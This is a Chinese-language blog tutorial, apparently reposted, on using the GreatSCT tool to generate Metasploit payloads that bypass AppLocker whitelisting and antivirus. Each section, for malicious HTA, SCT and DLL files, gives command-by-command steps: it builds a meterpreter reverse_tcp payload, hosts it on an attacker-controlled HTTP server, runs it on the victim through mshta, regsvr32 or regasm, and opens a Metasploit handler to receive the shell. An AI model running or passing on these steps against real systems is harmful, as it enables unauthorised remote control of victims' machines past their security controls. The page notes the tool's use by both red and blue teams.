在撰寫Applocker旁路系列時,我們發現了一個專門用于繞過白名單應用程式的新工具,因此,我決定寫這篇文章,在此我們將介紹另一個最有趣的工具“ Great SCT – Metasploit有效負載生成器”工具,該工具與Unicorn或msfvenom類似,因為它依賴于Metasploit框架來提供受害者計算機的反向連接,因此,讓我們從其教程開始并檢查其功能,
表中的內容
- GreatSCT
- 安裝與用法
- 生成惡意的hta檔案
- 生成惡意的sct檔案
- 生成惡意的dll檔案
GreatSCT
GreatSCT當前在@ConsciousHacker的支持下,該專案稱為Great SCT(偉大的Scott),Great SCT是一個開源專案,用于生成應用程式白名單繞過,此工具適用于紅色和藍色團隊,它是一種工具,用于生成繞過常見的防病毒解決方案和應用程式白名單解決方案的Metasploit有效負載,
您可以從這里下載:https://github.com/GreatSCT/GreatSCT
安裝與用法
必須先下載并安裝它才能開始使用Great SCT,運行以下命令從github下載Great SCT,并在安裝它時注意其依賴項工具,
通過使用以下工具,這有助于繞過Applocker策略:
- Installutil.exe: 安裝程式工具是命令列工具,可讓您通過運行安裝程式組件來安裝和卸載特定程式集中的服務器資源,
- Msbuild.exe: Microsoft Build Engine是用于構建應用程式的平臺,此引擎,也稱為MSBuild,
- Mshta.exe: Mshta.exe運行Microsoft HTML應用程式主機,這是Windows OS實用程式,負責運行HTA(HTML應用程式)檔案,我們可以運行JavaScript或Visual的HTML檔案,
- Regasm.exe:程式集注冊工具讀取程式集內的元資料,并將必要的條目添加到注冊表中,從而使COM客戶端可以透明地創建.NET Framework類,
- Regsvcs.exe: RegSvcs代表Microsoft .NET遠程注冊表服務,因.NET Services安裝而聞名,
- Regsvr32.exe: Regsvr32是一個命令列實用程式,用于在Windows注冊表中注冊和注銷OLE控制元件,例如DLL和ActiveX控制元件,
git clone //github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh
下載完成后,鍵入以下命令以訪問幫助命令:
use Bypass
現在要獲取有效載荷串列:
list
生成惡意的hta檔案
現在,從有效負載串列中,您可以選擇任何人進行所需的攻擊,但是對于這種攻擊,我們將使用:
use mshta/shellcode_inject/base64_migrate.py
執行命令后,鍵入:
generate
執行generate命令后,它會詢問您要使用哪種方法,因為我們將使用msfvenom型別1選擇第一個選項,然后單擊Enter作為抄表器,然后提供lhost和lport,分別為192.168.1.107、4321,
生成shellcode時,它將要求您提供有效負載的名稱,默認情況下,它將以“有效載荷”作為名稱,因為我不想給任何名字,所以我只按Enter鍵,
現在,它制作了兩個檔案,一個資源檔案,另一個hta檔案,
現在,首先,通過輸入以下命令在/ usr / share / greatsct-output / source中啟動python的服務器:
python -m SimpleHTTPServer 80
現在,在受害計算機的命令提示符下執行hta檔案,
mshta.exe //192.168.1.107/payload.hta
同時,使用資源檔案啟動多重/處理程式,為此,鍵入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有會議,
訪問此處“使用mshta.exe(多種方法)繞過應用程式白名單”,以了解有關mshta.exe技術的更多資訊,
生成惡意的sct檔案
現在,從有效負載串列中,您可以選擇任何人進行所需的攻擊,但是對于這種攻擊,我們將使用:
use regsvr32/shellcode_inject/base64_migrate.py
執行命令后,鍵入:
generate
然后它將要求您提供有效載荷,只需按Enter鍵,因為它將 Windows / meterpreter / reverse_tcp 作為默認有效載荷,而這正是我們需要的有效載荷,在提供了像這樣的IP之后,我們給了192.168.1.107和給定的埠(任意),如下圖所示,我們給lport提供了2345
提供詳細資訊后,它將詢問您的惡意軟體名稱,默認情況下,它將設定名稱“ payload”,以便您可以輸入名稱或僅按Enter鍵即可使用默認設定,
就像按Enter一樣,它將生成兩個檔案,其中一個將是資源檔案,其他將是.sct檔案,現在,通過輸入以下內容在/ usr / share / greatsct-output / source中啟動python的服務器:
python -m SimpleHTTPServer 80
現在,在受害者的PC的運行視窗中執行.sct檔案,如下所示
1
regsvr32.exe /s /u /n /i://192.168.1.107/payload.sct
同時,使用資源檔案啟動多重/處理程式,為此,鍵入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有會議,
訪問此處“使用regsrv32.exe繞過應用程式白名單(多種方法) ”,以了解有關mshta.exe技術的更多資訊,
生成惡意的dll檔案
現在,從有效負載串列中,您可以選擇任何人進行所需的攻擊,但是對于這種攻擊,我們將使用:
use regasm/meterpreter/rev_tcp.py
執行命令后,鍵入:
set lhost 192.168.1.107
generate
提供詳細資訊后,它將詢問您惡意軟體的名稱,默認情況下,它將設定名稱“ payload”,以便您可以輸入名稱或僅按Enter鍵即可使用默認設定,
就像按Enter一樣,它會生成dll檔案,
現在,通過輸入以下內容在/ usr / share / greatsct-output / compiled中啟動python的服務器:
python -m SimpleHTTPServer 80
現在將上面生成的dll檔案放置在以下位置:C:\ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ v4.0.30319 \,然后在受害者PC的運行視窗中執行.dll檔案,如下所示:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll
同時,使用資源檔案啟動多重/處理程式,為此,鍵入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有會議,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/143242.html
標籤:其他
上一篇:【新人求助】剛剛接觸KEA128,codewarrior也是剛剛玩的,有很多問題希望前輩們指點一下
下一篇:自動化測驗——測驗之巔!